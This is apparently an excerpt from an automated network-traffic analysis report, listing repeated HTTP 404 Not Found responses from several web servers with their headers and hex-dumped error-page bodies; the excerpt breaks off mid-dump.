                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:52 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:55 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:57 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA|2RU#a0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 13 Jan 2025 09:21:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 272Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 13 Jan 2025 09:21:25 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-13T09:21:30.0626729Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:18 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 